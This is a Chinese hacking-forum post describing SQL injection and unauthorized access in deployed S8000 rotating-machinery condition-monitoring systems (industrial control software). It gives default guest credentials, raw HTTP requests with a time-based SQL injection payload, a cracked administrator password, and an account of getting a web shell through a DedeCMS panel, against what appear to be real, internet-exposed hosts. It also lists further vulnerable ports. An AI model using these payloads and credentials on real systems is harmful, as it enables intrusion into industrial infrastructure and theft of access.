找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1995|回复: 0
打印 上一主题 下一主题

工控安全之某大型旋转机SQL注入通杀全版本(内网拓扑)

[复制链接]
跳转到指定楼层
楼主
发表于 2022-3-31 03:38:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

查看打雷案例: http://**.**.**.**/bugs/wooyun-2010-0135197
关键字: SCG8000 旋转机械在线状态监测
通过网络空间搜索: 旋转机械在线状态监测
成功搜索到 S8000 旋转机械在线状态监测与分析系统
成功搜索到案例一枚
**.**.**.**:8089/
上面还带着账号, 密码呢
guest_s guest_s
其实是可以注入的


	
GET /default.asp?username=admin&userpassword=guest_s&lang=0&login=s8000& HTTP/1.1 Host: **.**.**.**:8089 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 DNT: 1 Referer: **.**.**.**:8089/ Accept-Encoding: gzip, deflate, sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: ASPSESSIONIDSSBSSRRR=IEMPDKHAACJDABNIMADMLAPL; updateTips=true; language=zh; PHPSESSID=n49fsmb15gbuf4n8q3qko85i06; ASP.NET_SessionId=ymma2a2ogade0znpnm5wp3cw; ASPSESSIONIDCCADAQQS=CEPLJPHAMDMFDLGCLMNIDEGG; __utma=209175697.1832228353.1444478771.1444478771.1444478771.1; __utmc=209175697; __utmz=209175697.1444478771.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDSQASTRQQ=NJPJKPHAEIEIIDFLBGEDIFBE; DedeUserID=1; DedeUserID__ckMd5=513682e572e84453; DedeLoginTime=1444482489; DedeLoginTime__ckMd5=3338c8dffc8243d5; ASPSESSIONIDQSDSRQQR=CLLPDHNABPCNPOIBPBLDHMKI; s8k=Crt%5FDatabasePath%5F300=D%3A%5CMicrosoft+SQL+Server%5CMSSQL%5CData%5C&lang=0&DatabasePath%5Fs8k%5F300=C%3A%5CInetpub%5Cwwwroot%5Cpublic%5Cdatabase%5C&DatabaseType%5Fs8k%5F300=0


需要安装Java 2虚拟机J2RE1.4.2(或以上版本)才能正常浏览。
http://**.**.**.**/countries/china/our-locations/
这是官网案例吧


阿尔斯通创为实 还是2008年的世界500强呢~

 

 

 

 


可调频率!!!

 

 

 


8089端口,应该还开了其他端口 扫端口 结果如下:
**.**.**.**:8081/dede/
我一看到这个dede,感觉有戏, 一个通讯录有必要用dede?


查看文章 http://**.**.**.**/content/2414
成功得到账号密码 前减3 后减一位 **.**.**.**解密 得到:
admin aza5572273
shell不解释了,我见过最简单的拿shell


里面全是站


由于开启了安全模式,不能执行命令,不知如何绕过,已经到了我技术的边沿了....
**.**.**.**:8082/
**.**.**.**:8086/
**.**.**.**:8087/
**.**.**.**:8088/custom/
**.**.**.**:81/
另外一枚:
**.**.**.**/
这是没有guest_s
发现SQL注入一枚


	
POST /default.asp HTTP/1.1 Content-Length: 405 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: **.**.**.**/ Cookie: s8k=DatabaseType=0; ASPSESSIONIDSQSBDBDA=DCKJDKDAPEMMNJCNKEIBAECH Host: **.**.**.** Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* submit1=%b5%c7%c2%bc&IfRm=&IsFirst=0&JZGraphId=&menumark=1&owers8000=0&s8000companyId=176&s8000companyName=%d4%a3%b6%ab%b5%e7%b3%a7&s8000FactoryType=0&s8000graph=S8000MachineGraph_Old&s8000keyid=&select=176_%d4%a3%b6%ab%b5%e7%b3%a7&stationid=&username=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&userpass=rivireqe


宝宝找到了这个


据我的分析,当旋转机停止的时候里面的分析是加载不出来的,我也不知道什么时候才开,什么时候关
**.**.**.**/
再一枚未授权访问

 


里面的内容大致与第一个相同,就不截图了
**.**.**.**/

 

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表